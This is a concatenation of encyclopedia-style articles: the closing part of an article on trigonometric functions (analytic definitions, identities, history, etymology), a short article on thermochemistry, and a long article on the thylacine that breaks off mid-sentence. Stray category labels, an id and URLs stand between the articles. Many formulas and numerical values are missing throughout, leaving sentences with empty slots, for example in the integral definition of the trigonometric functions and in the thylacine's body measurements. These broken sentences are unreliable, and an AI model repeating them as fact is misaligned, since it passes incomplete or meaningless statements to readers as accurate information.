Hardy noted in his 1908 work A Course of Pure Mathematics that the definition of the trigonometric functions in terms of the unit circle is not satisfactory, because it depends implicitly on a notion of angle that can be measured by a real number. Thus in modern analysis, trigonometric functions are usually constructed without reference to geometry. Various ways exist in the literature for defining the trigonometric functions in a manner suitable for analysis; they include:
using the "geometry" of the unit circle, which requires formulating the arc length of a circle (or the area of a sector) analytically;
by a power series, which is particularly well-suited to complex variables;
by using an infinite product expansion;
by inverting the inverse trigonometric functions, which can be defined as integrals of algebraic or rational functions;
as solutions of a differential equation.
Definition by differential equations Sine and cosine can be defined as the unique solution to the initial value problem sin′ = cos, cos′ = −sin, sin(0) = 0, cos(0) = 1. Differentiating again, sin″ = −sin and cos″ = −cos, so both sine and cosine are solutions of the same ordinary differential equation y″ + y = 0. Sine is the unique solution with y(0) = 0 and y′(0) = 1; cosine is the unique solution with y(0) = 1 and y′(0) = 0. One can then prove, as a theorem, that solutions are periodic, having the same period. Writing this period as 2π is then a definition of the real number π which is independent of geometry. Applying the quotient rule to the tangent tan = sin/cos gives tan′ = 1 + tan², so the tangent function satisfies the ordinary differential equation y′ = 1 + y². It is the unique solution with y(0) = 0. Power series expansion The basic trigonometric functions can be defined by the following power series expansions, also known as the Taylor series or Maclaurin series of these trigonometric functions: sin x = x − x³/3! + x⁵/5! − x⁷/7! + ⋯ and cos x = 1 − x²/2! + x⁴/4! − x⁶/6! + ⋯. The radius of convergence of these series is infinite. Therefore, the sine and the cosine can be extended to entire functions (also called "sine" and "cosine"), which are (by definition) complex-valued functions that are defined and holomorphic on the whole complex plane. Term-by-term differentiation shows that the sine and cosine defined by the series obey the differential equation discussed previously, and conversely one can obtain these series from elementary recursion relations derived from the differential equation. Being defined as fractions of entire functions, the other trigonometric functions may be extended to meromorphic functions, that is, functions that are holomorphic in the whole complex plane, except at some isolated points called poles. Here, the poles are the numbers of the form (2k + 1)π/2 for the tangent and the secant, or kπ for the cotangent and the cosecant, where k is an arbitrary integer. Recurrence relations may also be computed for the coefficients of the Taylor series of the other trigonometric functions. These series have a finite radius of convergence. Their coefficients have a combinatorial interpretation: they enumerate alternating permutations of finite sets. More precisely, defining Uₙ, the nth up/down number, Bₙ, the nth Bernoulli number, and Eₙ, the nth Euler number, one has the following series expansions: Continued fraction expansion The following continued fractions are valid in the whole complex plane: The last one was used in the historically first proof that π is irrational. Partial fraction expansion There is a series representation as partial fraction expansion where just translated reciprocal functions are summed up, such that the poles of the cotangent function and the reciprocal functions match: π cot(πx) = 1/x + Σ (1/(x − n) + 1/(x + n)), the sum running over all integers n ≥ 1. This identity can be proved with the Herglotz trick. 
Combining the (−n)th with the nth term leads to an absolutely convergent series. Similarly, one can find a partial fraction expansion for the secant, cosecant and tangent functions. Infinite product expansion The following infinite product for the sine is due to Leonhard Euler, and is of great importance in complex analysis: sin x = x Π (1 − x²/(n²π²)), the product running over all integers n ≥ 1. This may be obtained from the partial fraction decomposition of the cotangent given above, which is the logarithmic derivative of the sine. From this, it can be deduced also that Euler's formula and the exponential function Euler's formula relates sine and cosine to the exponential function: e^(ix) = cos x + i sin x. This formula is commonly considered for real values of x, but it remains true for all complex values. Proof: Let f₁(x) = cos x + i sin x and f₂(x) = e^(ix). One has f′ⱼ(x) = i fⱼ(x) for j = 1, 2. The quotient rule thus implies that (f₁/f₂)′ = 0. Therefore, f₁/f₂ is a constant function, which equals 1, as f₁(0) = f₂(0) = 1. This proves the formula. One has e^(ix) = cos x + i sin x and e^(−ix) = cos x − i sin x. Solving this linear system in sine and cosine, one can express them in terms of the exponential function: cos x = (e^(ix) + e^(−ix))/2 and sin x = (e^(ix) − e^(−ix))/(2i). When x is real, this may be rewritten as cos x = Re(e^(ix)) and sin x = Im(e^(ix)). Most trigonometric identities can be proved by expressing trigonometric functions in terms of the complex exponential function by using the above formulas, and then using the identity e^(a+b) = e^a e^b for simplifying the result. Euler's formula can also be used to define the basic trigonometric functions directly, as follows, using the language of topological groups. The set of complex numbers of unit modulus is a compact and connected topological group, which has a neighborhood of the identity that is homeomorphic to the real line. Therefore, it is isomorphic as a topological group to the one-dimensional torus group R/Z, via an isomorphism In pedestrian terms , and this isomorphism is unique up to taking complex conjugates. For a nonzero real number a (the base), the function defines an isomorphism of the group R/aZ. The real and imaginary parts of are the cosine and sine, where a is used as the base for measuring angles. For example, when a = 2π, we get the measure in radians, and the usual trigonometric functions. When a = 360, we get the sine and cosine of angles measured in degrees. Note that a = 2π is the unique value at which the derivative becomes a unit vector with positive imaginary part at t = 0. This fact can, in turn, be used to define the constant 2π. Definition via integration Another way to define the trigonometric functions in analysis is using integration. For a real number x, put arctan x = ∫₀ˣ dt/(1 + t²), which defines the inverse tangent function. Also, π can be defined in this setting, by a definition that goes back to Karl Weierstrass. On the interval , the trigonometric functions are defined by inverting the relation . Thus we define the trigonometric functions by where the point is on the graph of and the positive square root is taken. This defines the trigonometric functions on . The definition can be extended to all real numbers by first observing that, as , , and so and . Thus and are extended continuously so that . Now the conditions and define the sine and cosine as periodic functions with period 2π, for all real numbers. To prove the basic properties of sine and cosine, including the fact that sine and cosine are analytic, one may first establish the addition formulae. First, holds, provided , since after the substitution . In particular, the limiting case as gives Thus we have and So the sine and cosine functions are related by translation over a quarter period π/2. Definitions using functional equations One can also define the trigonometric functions using various functional equations. 
For example, the sine and the cosine form the unique pair of continuous functions that satisfy the difference formula and the added condition In the complex plane The sine and cosine of a complex number can be expressed in terms of real sines, cosines, and hyperbolic functions as follows: By taking advantage of domain coloring, it is possible to graph the trigonometric functions as complex-valued functions. Various features unique to the complex functions can be seen from the graph; for example, the sine and cosine functions can be seen to be unbounded as the imaginary part of z becomes larger (since the color white represents infinity), and the fact that the functions contain simple zeros or poles is apparent from the fact that the hue cycles around each zero or pole exactly once. Comparing these graphs with those of the corresponding hyperbolic functions highlights the relationships between the two. Periodicity and asymptotes The cosine and sine functions are periodic, with period 2π, which is the smallest positive period. Consequently, the secant and cosecant also have 2π as their period. The functions sine and cosine also have π as a semiperiod, and consequently Also, the sine function has a unique zero (at z = 0) in the strip |Re(z)| < π, and the cosine function has the pair of zeros z = ±π/2 in the same strip. Because of the periodicity, the zeros of sine are the integer multiples of π. The zeros of cosine are the odd integer multiples of π/2. All of the zeros are simple zeros, and both functions have derivative ±1 at each of the zeros. The tangent function has a simple zero at 0 and vertical asymptotes at ±π/2, where it has a simple pole of residue −1. Again, owing to the periodicity, the zeros are all the integer multiples of π and the poles are odd multiples of π/2, all having the same residue. The poles correspond to vertical asymptotes. The cotangent function has a simple pole of residue 1 at the integer multiples of π and simple zeros at odd multiples of π/2. The poles correspond to vertical asymptotes. Basic identities Many identities interrelate the trigonometric functions. This section contains the most basic ones; for more identities, see List of trigonometric identities. These identities may be proved geometrically from the unit-circle definitions or the right-angled-triangle definitions (although, for the latter definitions, care must be taken for angles that are not in the interval [0, π/2]; see Proofs of trigonometric identities). For non-geometrical proofs using only tools of calculus, one may use directly the differential equations, in a way that is similar to that of the above proof of Euler's identity. One can also use Euler's identity for expressing all trigonometric functions in terms of complex exponentials and using properties of the exponential function. Parity The cosine and the secant are even functions; the other trigonometric functions are odd functions. That is: sin(−x) = −sin x, cos(−x) = cos x, tan(−x) = −tan x, and similarly for the cotangent, secant and cosecant. Periods All trigonometric functions are periodic functions of period 2π. This is the smallest period, except for the tangent and the cotangent, which have π as smallest period. This means that, for every integer k, one has sin(x + 2kπ) = sin x, cos(x + 2kπ) = cos x, and tan(x + kπ) = tan x. Pythagorean identity The Pythagorean identity is the expression of the Pythagorean theorem in terms of trigonometric functions. It is sin²x + cos²x = 1. Dividing through by either cos²x or sin²x gives tan²x + 1 = sec²x and 1 + cot²x = csc²x. Sum and difference formulas The sum and difference formulas allow expanding the sine, the cosine, and the tangent of a sum or a difference of two angles in terms of sines and cosines and tangents of the angles themselves. These can be derived geometrically, using arguments that date to Ptolemy. 
One can also produce them algebraically using Euler's formula. Sum: sin(a + b) = sin a cos b + cos a sin b, cos(a + b) = cos a cos b − sin a sin b, and tan(a + b) = (tan a + tan b)/(1 − tan a tan b). Difference: sin(a − b) = sin a cos b − cos a sin b, cos(a − b) = cos a cos b + sin a sin b, and tan(a − b) = (tan a − tan b)/(1 + tan a tan b). When the two angles are equal, the sum formulas reduce to simpler equations known as the double-angle formulae. These identities can be used to derive the product-to-sum identities. By setting t = tan(x/2), all trigonometric functions of x can be expressed as rational fractions of t. Together with dx = 2 dt/(1 + t²), this is the tangent half-angle substitution, which reduces the computation of integrals and antiderivatives of trigonometric functions to that of rational fractions. Derivatives and antiderivatives The derivatives of trigonometric functions result from those of sine and cosine by applying the quotient rule. The values given for the antiderivatives in the following table can be verified by differentiating them. The number C is a constant of integration. Note: for 0 < x < π, the integral of csc x can also be written as −arsinh(cot x), and the integral of sec x, for −π/2 < x < π/2, as arsinh(tan x), where arsinh is the inverse hyperbolic sine. Alternatively, the derivatives of the 'co-functions' can be obtained using trigonometric identities and the chain rule: Inverse functions The trigonometric functions are periodic, and hence not injective, so strictly speaking, they do not have an inverse function. However, on each interval on which a trigonometric function is monotonic, one can define an inverse function, and this defines inverse trigonometric functions as multivalued functions. To define a true inverse function, one must restrict the domain to an interval where the function is monotonic, and is thus bijective from this interval to its image by the function. The common choice for this interval, called the set of principal values, is given in the following table. As usual, the inverse trigonometric functions are denoted with the prefix "arc" before the name or abbreviation of the function. The notations sin⁻¹, cos⁻¹, etc. are often used for arcsin, arccos, etc. When this notation is used, inverse functions could be confused with multiplicative inverses. The notation with the "arc" prefix avoids such a confusion, though "arcsec" for arcsecant can be confused with "arcsecond". Just like the sine and cosine, the inverse trigonometric functions can also be expressed in terms of infinite series. They can also be expressed in terms of complex logarithms. Applications Angles and sides of a triangle In this section A, B, C denote the three (interior) angles of a triangle, and a, b, c denote the lengths of the respective opposite edges. They are related by various formulas, which are named by the trigonometric functions they involve. Law of sines The law of sines states that for an arbitrary triangle with sides a, b, and c and angles opposite those sides A, B and C: a/sin A = b/sin B = c/sin C = abc/(2Δ), where Δ is the area of the triangle, or, equivalently, = 2R, where R is the triangle's circumradius. It can be proved by dividing the triangle into two right ones and using the above definition of sine. The law of sines is useful for computing the lengths of the unknown sides in a triangle if two angles and one side are known. This is a common situation occurring in triangulation, a technique to determine unknown distances by measuring two angles and an accessible enclosed distance. Law of cosines The law of cosines (also known as the cosine formula or cosine rule) is an extension of the Pythagorean theorem: c² = a² + b² − 2ab cos C, or equivalently, cos C = (a² + b² − c²)/(2ab). In this formula the angle at C is opposite to the side c. This theorem can be proved by dividing the triangle into two right ones and using the Pythagorean theorem. 
The law of cosines can be used to determine a side of a triangle if two sides and the angle between them are known. It can also be used to find the cosine of an angle (and consequently the angles themselves) if the lengths of all the sides are known. Law of tangents The law of tangents says that: (a − b)/(a + b) = tan((A − B)/2) / tan((A + B)/2). Law of cotangents If s is the triangle's semiperimeter, (a + b + c)/2, and r is the radius of the triangle's incircle, then rs is the triangle's area. Therefore Heron's formula implies that: r = √((s − a)(s − b)(s − c)/s). The law of cotangents says that: cot(A/2)/(s − a) = cot(B/2)/(s − b) = cot(C/2)/(s − c) = 1/r. It follows that cot(A/2) + cot(B/2) + cot(C/2) = s/r. Periodic functions The trigonometric functions are also important in physics. The sine and the cosine functions, for example, are used to describe simple harmonic motion, which models many natural phenomena, such as the movement of a mass attached to a spring and, for small angles, the pendular motion of a mass hanging by a string. The sine and cosine functions are one-dimensional projections of uniform circular motion. Trigonometric functions also prove to be useful in the study of general periodic functions. The characteristic wave patterns of periodic functions are useful for modeling recurring phenomena such as sound or light waves. Under rather general conditions, a periodic function can be expressed as a sum of sine waves or cosine waves in a Fourier series. Denoting the sine or cosine basis functions by φₖ, the expansion of the periodic function f(t) takes the form: f(t) = Σ cₖ φₖ(t), summed over k. For example, the square wave can be written as the Fourier series (4/π) Σ sin((2k − 1)t)/(2k − 1), summed over all integers k ≥ 1. In the animation of a square wave at top right it can be seen that just a few terms already produce a fairly good approximation. The superposition of several terms in the expansion of a sawtooth wave is shown underneath. History While the early study of trigonometry can be traced to antiquity, the trigonometric functions as they are in use today were developed in the medieval period. The chord function was discovered by Hipparchus of Nicaea (180–125 BCE) and Ptolemy of Roman Egypt (90–165 CE). The functions of sine and versine (1 − cosine) can be traced back to the jyā and koti-jyā functions used in Gupta period Indian astronomy (Aryabhatiya, Surya Siddhanta), via translation from Sanskrit to Arabic and then from Arabic to Latin. (See Aryabhata's sine table.) All six trigonometric functions in current use were known in Islamic mathematics by the 9th century, as was the law of sines, used in solving triangles. With the exception of the sine (which was adopted from Indian mathematics), the other five modern trigonometric functions were discovered by Persian and Arab mathematicians, including the cosine, tangent, cotangent, secant and cosecant. Al-Khwārizmī (c. 780–850) produced tables of sines, cosines and tangents. Circa 830, Habash al-Hasib al-Marwazi discovered the cotangent, and produced tables of tangents and cotangents. Muhammad ibn Jābir al-Harrānī al-Battānī (853–929) discovered the reciprocal functions of secant and cosecant, and produced the first table of cosecants for each degree from 1° to 90°. The trigonometric functions were later studied by mathematicians including Omar Khayyám, Bhāskara II, Nasir al-Din al-Tusi, Jamshīd al-Kāshī (14th century), Ulugh Beg (14th century), Regiomontanus (1464), Rheticus, and Rheticus' student Valentinus Otho. Madhava of Sangamagrama (c. 1400) made early strides in the analysis of trigonometric functions in terms of infinite series. (See Madhava series and Madhava's sine table.) 
The tangent function was brought to Europe by Giovanni Bianchini in 1467, in trigonometry tables he created to support the calculation of stellar coordinates. The terms tangent and secant were first introduced by the Danish mathematician Thomas Fincke in his book Geometria rotundi (1583). The 17th century French mathematician Albert Girard made the first published use of the abbreviations sin, cos, and tan in his book Trigonométrie. In a paper published in 1682, Gottfried Leibniz proved that sin x is not an algebraic function of x. Though introduced as ratios of sides of a right triangle, and thus appearing to be rational functions, Leibniz's result established that they are actually transcendental functions of their argument. The task of assimilating circular functions into algebraic expressions was accomplished by Euler in his Introduction to the Analysis of the Infinite (1748). His method was to show that the sine and cosine functions are alternating series formed from the even and odd terms, respectively, of the exponential series. He presented "Euler's formula", as well as near-modern abbreviations (sin., cos., tang., cot., sec., and cosec.). A few functions were common historically, but are now seldom used, such as the chord, versine (which appeared in the earliest tables), haversine, coversine, half-tangent (tangent of half an angle), and exsecant. List of trigonometric identities shows more relations between these functions. Historically, trigonometric functions were often combined with logarithms in compound functions like the logarithmic sine, logarithmic cosine, logarithmic secant, logarithmic cosecant, logarithmic tangent and logarithmic cotangent. Etymology The word sine derives from Latin sinus, meaning "bend; bay", and more specifically "the hanging fold of the upper part of a toga", "the bosom of a garment", which was chosen as the translation of what was interpreted as the Arabic word jaib, meaning "pocket" or "fold", in the twelfth-century translations of works by Al-Battani and al-Khwārizmī into Medieval Latin. The choice was based on a misreading of the Arabic written form j-y-b (), which itself originated as a transliteration from Sanskrit jīvā, which along with its synonym jyā (the standard Sanskrit term for the sine) translates to "bowstring", being in turn adopted from Ancient Greek "string". The word tangent comes from Latin tangens, meaning "touching", since the line touches the circle of unit radius, whereas secant stems from Latin secans, meaning "cutting", since the line cuts the circle. The prefix "co-" (in "cosine", "cotangent", "cosecant") is found in Edmund Gunter's Canon triangulorum (1620), which defines the cosinus as an abbreviation for the sinus complementi (sine of the complementary angle) and proceeds to define the cotangens similarly.
Mathematics
Geometry
null
30369
https://en.wikipedia.org/wiki/Thermochemistry
Thermochemistry
Thermochemistry is the study of the heat energy which is associated with chemical reactions and/or phase changes such as melting and boiling. A reaction may release or absorb energy, and a phase change may do the same. Thermochemistry focuses on the energy exchange between a system and its surroundings in the form of heat. Thermochemistry is useful in predicting reactant and product quantities throughout the course of a given reaction. In combination with entropy determinations, it is also used to predict whether a reaction is spontaneous or non-spontaneous, favorable or unfavorable. Endothermic reactions absorb heat, while exothermic reactions release heat. Thermochemistry coalesces the concepts of thermodynamics with the concept of energy in the form of chemical bonds. The subject commonly includes calculations of such quantities as heat capacity, heat of combustion, heat of formation, enthalpy, entropy, and free energy. Thermochemistry is one part of the broader field of chemical thermodynamics, which deals with the exchange of all forms of energy between system and surroundings, including not only heat but also various forms of work, as well as the exchange of matter. When all forms of energy are considered, the concepts of exothermic and endothermic reactions are generalized to exergonic reactions and endergonic reactions. History Thermochemistry rests on two generalizations. Stated in modern terms, they are as follows:
Lavoisier and Laplace's law (1780): The energy change accompanying any transformation is equal and opposite to the energy change accompanying the reverse process.
Hess' law of constant heat summation (1840): The energy change accompanying any transformation is the same whether the process occurs in one step or many.
These statements preceded the first law of thermodynamics (1845) and helped in its formulation. Thermochemistry also involves the measurement of the latent heat of phase transitions. Joseph Black had already introduced the concept of latent heat in 1761, based on the observation that heating ice at its melting point did not raise the temperature but instead caused some ice to melt. Gustav Kirchhoff showed in 1858 that the variation of the heat of reaction is given by the difference in heat capacity between products and reactants: dΔH/dT = ΔCp. Integration of this equation permits the evaluation of the heat of reaction at one temperature from measurements at another temperature (a worked sketch of this follows the Processes section below). Calorimetry The measurement of heat changes is performed using calorimetry, usually an enclosed chamber within which the change to be examined occurs. The temperature of the chamber is monitored using either a thermometer or a thermocouple, and the temperature is plotted against time to give a graph from which fundamental quantities can be calculated. Modern calorimeters are frequently supplied with automatic devices to provide a quick read-out of information, one example being the differential scanning calorimeter. Systems Several thermodynamic definitions are very useful in thermochemistry. A system is the specific portion of the universe that is being studied. Everything outside the system is considered the surroundings or environment. 
A system may be:
a (completely) isolated system, which can exchange neither energy nor matter with the surroundings, such as an insulated bomb calorimeter
a thermally isolated system, which can exchange mechanical work but not heat or matter, such as an insulated closed piston or balloon
a mechanically isolated system, which can exchange heat but not mechanical work or matter, such as an uninsulated bomb calorimeter
a closed system, which can exchange energy but not matter, such as an uninsulated closed piston or balloon
an open system, which can exchange both matter and energy with the surroundings, such as a pot of boiling water
Processes
A system undergoes a process when one or more of its properties changes. A process relates to the change of state. An isothermal (same-temperature) process occurs when the temperature of the system remains constant. An isobaric (same-pressure) process occurs when the pressure of the system remains constant. A process is adiabatic when no heat exchange occurs.
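Returning to Kirchhoff's relation quoted in the History section above, its integrated form (a standard textbook sketch, not tied to any particular source) is

$$
\Delta H(T_2) = \Delta H(T_1) + \int_{T_1}^{T_2} \Delta C_p \, dT
\;\approx\; \Delta H(T_1) + \Delta C_p\,(T_2 - T_1),
$$

where the approximation holds when ΔCp is roughly constant over the temperature range of interest.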
Physical sciences
Thermodynamics
Chemistry
30388
https://en.wikipedia.org/wiki/Thylacine
Thylacine
The thylacine (binomial name Thylacinus cynocephalus), also commonly known as the Tasmanian tiger or Tasmanian wolf, is an extinct carnivorous marsupial that was native to the Australian mainland and the islands of Tasmania and New Guinea. The thylacine died out in New Guinea and mainland Australia around 3,600–3,200 years ago, prior to the arrival of Europeans, possibly because of the introduction of the dingo, whose earliest record dates to around the same time, but which never reached Tasmania. Prior to European settlement, around 5,000 remained in the wild on Tasmania. Beginning in the nineteenth century, they were perceived as a threat to the livestock of farmers, and bounty hunting was introduced. The last known individual of its species died in 1936 at Hobart Zoo in Tasmania. The thylacine is widespread in popular culture and is a cultural icon in Australia. The thylacine was known as the Tasmanian tiger because of the dark transverse stripes that radiated from the top of its back, and it was called the Tasmanian wolf because it resembled a medium- to large-sized canid. The name thylacine is derived from thýlakos, meaning "pouch", and -ine, meaning "pertaining to", and refers to the marsupial pouch. Both sexes had a pouch. The females used theirs for rearing young, and the males used theirs as a protective sheath covering the external reproductive organs. The animal had a stiff tail and could open its jaws to an unusual extent. Recent studies and anecdotal evidence on its predatory behaviour suggest that the thylacine was a solitary ambush predator specialised in hunting small- to medium-sized prey. Accounts suggest that, in the wild, it fed on small birds and mammals. It was the only member of the genus Thylacinus and family Thylacinidae to have survived until modern times. Its closest living relatives are the other members of Dasyuromorphia, including the Tasmanian devil, from which it is estimated to have split 42–36 million years ago. Intensive hunting on Tasmania is generally blamed for its extinction, but other contributing factors were disease, the introduction of and competition with dingoes, human encroachment into its habitat, and climate change. The remains of the last known thylacine were discovered at the Tasmanian Museum and Art Gallery in 2022. Since extinction there have been numerous searches and reported sightings of live animals, none of which have been confirmed. The thylacine has been used extensively as a symbol of Tasmania. The animal is featured on the official coat of arms of Tasmania. Since 1996, National Threatened Species Day has been commemorated in Australia on 7 September, the date on which the last known thylacine died in 1936. Universities, museums and other institutions across the world research the animal. Its whole genome sequence has been mapped, and there are efforts to clone it and bring it back to life.
Taxonomic and evolutionary history
Numerous examples of thylacine engravings and rock art have been found, dating back to at least 1000 BC. Petroglyph images of the thylacine can be found at the Dampier Rock Art Precinct, on the Burrup Peninsula in Western Australia. By the time the first European explorers arrived, the animal was already extinct in mainland Australia and New Guinea and rare in Tasmania. Europeans may have encountered it in Tasmania as far back as 1642, when Abel Tasman first arrived in Tasmania. His shore party reported seeing the footprints of "wild beasts having claws like a Tyger".
Marc-Joseph Marion du Fresne, arriving with the Mascarin in 1772, reported seeing a "tiger cat". The first definitive encounter was by French explorers on 13 May 1792, as noted by the naturalist Jacques Labillardière in his journal from the expedition led by d'Entrecasteaux. In 1805, William Paterson, the Lieutenant Governor of Tasmania, sent a detailed description for publication in the Sydney Gazette. He also sent a description of the thylacine in a letter to Joseph Banks, dated 30 March 1805. The first detailed scientific description was made by Tasmania's Deputy Surveyor-General, George Harris, in 1808, five years after the first European settlement of the island. Harris originally placed the thylacine in the genus Didelphis, which had been created by Linnaeus for the American opossums, describing it as Didelphis cynocephala, the "dog-headed opossum". Recognition that the Australian marsupials were fundamentally different from the known mammal genera led to the establishment of the modern classification scheme, and in 1796, Geoffroy Saint-Hilaire created the genus Dasyurus, where he placed the thylacine in 1810. To maintain gender agreement with the genus name, the species name was altered to cynocephalus. In 1824, it was separated out into its own genus, Thylacinus, by Temminck. The common name derives directly from the genus name, originally from the Greek thýlakos, meaning "pouch" or "sack", and -ine, meaning "pertaining to".
Evolution
The earliest records of the modern thylacine are from the Early Pleistocene, with the oldest known fossil record in southeastern Australia from the Calabrian age, around 1.77–0.78 million years ago. Specimens from the Pliocene-aged Chinchilla Fauna, described as Thylacinus rostralis by Charles De Vis in 1894, have in the past been suggested to represent Thylacinus cynocephalus, but have been shown either to have been curatorial errors or to be ambiguous in their specific attribution. The family Thylacinidae includes at least 12 species in eight genera. Thylacinids are estimated to have split from other members of Dasyuromorphia around 42–36 million years ago. The earliest representative of the family is Badjcinus turnbulli from the Late Oligocene of Riversleigh in Queensland, around 25 million years ago. Early thylacinids were quoll-sized, well under . They probably ate insects and small reptiles and mammals, although signs of an increasingly carnivorous diet can be seen as early as the early Miocene in Wabulacinus. Members of the genus Thylacinus are notable for a dramatic increase in both the expression of carnivorous dental traits and in size, with the largest species, Thylacinus potens and Thylacinus megiriani, both approaching the size of a wolf. In late Pleistocene and early Holocene times, the modern thylacine was widespread (although never numerous) throughout Australia and New Guinea. A classic example of convergent evolution, the thylacine showed many similarities to the members of the dog family, Canidae, of the Northern Hemisphere: sharp teeth, powerful jaws, raised heels, and the same general body form. Since the thylacine filled the same ecological niche in Australia and New Guinea as canids did elsewhere, it developed many of the same features. Despite this, as a marsupial, it is unrelated to any of the Northern Hemisphere placental mammal predators. The thylacine is a basal member of the Dasyuromorphia, along with numbats, dunnarts, wambengers, and quolls. The phylogeny of Thylacinidae follows Rovinsky et al. (2019).
Description
The only recorded species of Thylacinus, a genus that superficially resembles the dogs and foxes of the family Canidae, the thylacine was a predatory marsupial that existed on mainland Australia during the Holocene epoch and was observed by Europeans on the island of Tasmania; the species is known as the Tasmanian tiger for the striped markings of its pelage. Descriptions of the thylacine come from preserved specimens, fossil records, skins and skeletal remains, and black-and-white photographs and film of the animal both in captivity and from the field. The thylacine resembled a large, short-haired dog with a stiff tail which smoothly extended from the body in a way similar to that of a kangaroo. The mature thylacine measured about in shoulder height and in body length, excluding the tail, which measured around . Because the recorded body mass estimates are scant, it has been suggested that they may have weighed anywhere from , but a 2020 study that examined 93 adult specimens, 40 of them of known sex, argued that their average body mass would be with a range of based on volumetric analysis. There was slight sexual dimorphism, with the males being larger than females on average. Males weighed on average , and females on average weighed . The skull is noted to be highly convergent on those of canids, most closely resembling that of the red fox. Thylacines, uniquely for marsupials, had largely cartilaginous epipubic bones with a highly reduced osseous element. This was once considered a synapomorphy with sparassodonts, though it is now thought that both groups reduced their epipubics independently. Its yellow-brown coat featured 15 to 20 distinctive dark stripes across its back, rump and the base of its tail, which earned the animal the nickname "tiger". The stripes were more pronounced in younger specimens, fading as the animal got older. One of the stripes extended down the outside of the rear thigh. Its body hair was dense and soft, up to in length. Colouration varied from light fawn to a dark brown; the belly was cream-coloured. Its rounded, erect ears were about long and covered with short fur. Early scientific studies suggested it possessed an acute sense of smell which enabled it to track prey, but analysis of its brain structure revealed that its olfactory bulbs were not well developed. It is likely to have relied on sight and sound when hunting instead. In 2017, Berns and Ashwell published comparative cortical maps of thylacine and Tasmanian devil brains, showing that the thylacine had a larger, more modularised basal ganglion. The authors associated these differences with the thylacine's more predatory lifestyle. Analysis of the forebrain published in 2023 suggested that it was similar in morphology to other dasyuromorph marsupials and dissimilar to that of canids. The thylacine was able to open its jaws to an unusual extent: up to 80 degrees. This capability can be seen in part in David Fleay's short black-and-white film sequence of a captive thylacine from 1933. The jaws were muscular and had 46 teeth, but studies show the thylacine jaw was too weak to kill sheep. The tail vertebrae were fused to a degree, with resulting restriction of full tail movement. Fusion may have occurred as the animal reached full maturity. The tail tapered towards the tip. In juveniles, the tip of the tail had a ridge. The female thylacine had a pouch with four teats, but unlike many other marsupials, the pouch opened to the rear of its body.
Males had a scrotal pouch, unique amongst the Australian marsupials, into which they could withdraw their scrotal sac for protection. Thylacine footprints could be distinguished from those of other native or introduced animals; unlike foxes, cats, dogs, wombats, or Tasmanian devils, thylacines had a very large rear pad and four obvious front pads, arranged in almost a straight line. The hindfeet were similar to the forefeet but had four digits rather than five. Their claws were non-retractable. The plantar pad is tri-lobal: a single pad divided by three deep grooves into three distinctive lobes. The distinctive plantar pad shape, along with the asymmetrical nature of the foot, makes it quite different from animals such as dogs or foxes. The thylacine was noted as having a stiff and somewhat awkward gait, making it unable to run at high speed. It could also perform a bipedal hop, in a fashion similar to a kangaroo, demonstrated at various times by captive specimens. Guiler speculates that this was used as an accelerated form of motion when the animal became alarmed. The animal was also able to balance on its hind legs and stand upright for brief periods. Observers of the animal in the wild and in captivity noted that it would growl and hiss when agitated, often accompanied by a threat-yawn. During hunting, it would emit a series of rapidly repeated guttural cough-like barks (described as "yip-yap", "cay-yip" or "hop-hop-hop"), probably for communication between the family pack members. It also had a long whining cry, probably for identification at distance, and a low snuffling noise used for communication between family members. Some observers described it as having a strong and distinctive smell, others described a faint, clean, animal odour, and some no odour at all. It is possible that the thylacine, like its relative the Tasmanian devil, gave off an odour when agitated.
Distribution and habitat
The thylacine most likely preferred the dry eucalyptus forests, wetlands, and grasslands of mainland Australia. Indigenous Australian rock paintings indicate that the thylacine lived throughout mainland Australia and New Guinea. Proof of the animal's existence in mainland Australia came from a desiccated carcass that was discovered in a cave in the Nullarbor Plain in Western Australia in 1990; carbon dating revealed it to be around 3,300 years old. Recently examined fossilised footprints also suggest a historical distribution of the species on Kangaroo Island. The northernmost record of the species is from the Kiowa rock shelter in Chimbu Province in the highlands of Papua New Guinea, dating to the Early Holocene, around 10,000–8,500 years Before Present. In 2017, White, Mitchell and Austin published a large-scale analysis of thylacine mitochondrial genomes, showing that the species had split into eastern and western populations on the mainland prior to the Last Glacial Maximum and that Tasmanian thylacines had low genetic diversity by the time of European arrival. In Tasmania, they preferred the woodlands of the midlands and coastal heath, which eventually became the primary focus of British settlers seeking grazing land for their livestock. The striped pattern may have provided camouflage in woodland conditions, but it may have also served for identification purposes. The species had a typical home range of between . It appears to have kept to its home range without being territorial; groups too large to be a family unit were sometimes observed together.
Ecology and behaviour
Reproduction
There is evidence for at least some year-round breeding (cull records show joeys discovered in the pouch at all times of the year), although the peak breeding season was in winter and spring. They would produce up to four joeys per litter (typically two or three), carrying the young in a pouch for up to three months and protecting them until they were at least half adult size. Early pouch young were hairless and blind, but they had their eyes open and were fully furred by the time they left the pouch. The young also had their own pouches, which were not visible until they were 9.5 weeks old. After leaving the pouch, and until they were developed enough to assist, the juveniles would remain in the lair while their mother hunted. Thylacines bred successfully in captivity only once, at Melbourne Zoo in 1899. Their life expectancy in the wild is estimated to have been 5 to 7 years, although captive specimens survived up to 9 years. In 2018, Newton et al. collected and CT-scanned all known preserved thylacine pouch young specimens to digitally reconstruct their development throughout their entire window of growth in their mother's pouch. This study revealed new information on the biology of the thylacine, including the growth of its limbs and when it developed its 'dog-like' appearance. It was found that two of the thylacine young in the Tasmanian Museum and Art Gallery (TMAG) were misidentified and of another species, reducing the number of known pouch young specimens to 11 worldwide. One of four specimens kept at Museum Victoria has been serially sectioned, allowing an in-depth investigation of its internal tissues and providing some insights into thylacine pouch young development, biology, immunology and ecology.
Feeding and diet
The thylacine was an apex predator, though exactly how large its prey animals could be is disputed. It was a nocturnal and crepuscular hunter, spending the daylight hours in small caves or hollow tree trunks in a nest of twigs, bark, or fern fronds. It tended to retreat to the hills and forest for shelter during the day and hunted in the open heath at night. Early observers noted that the animal was typically shy and secretive, aware of the presence of humans and generally avoiding contact, although it occasionally showed inquisitive traits. At the time, much stigma existed in regard to its "fierce" nature; this is likely to be due to its perceived threat to agriculture. Historical accounts suggest that in the wild the thylacine preyed on small mammals and birds. Waterbirds were the most commonly recorded bird prey, with historical accounts of thylacines preying on black ducks and teals, while coots, Tasmanian nativehens, swamphens, herons (Ardea) and black swans were also likely items of prey. The thylacine may also have preyed upon the now extinct Tasmanian emu. The most commonly recorded mammalian prey was the red-necked wallaby, with other recorded prey including the Tasmanian pademelon and the short-beaked echidna. Other probable native mammalian prey includes other marsupials like bandicoots and brushtail possums, as well as native rodents like water rats. Following their introduction to Tasmania, European rabbits rapidly multiplied and became abundant across the island, with a number of 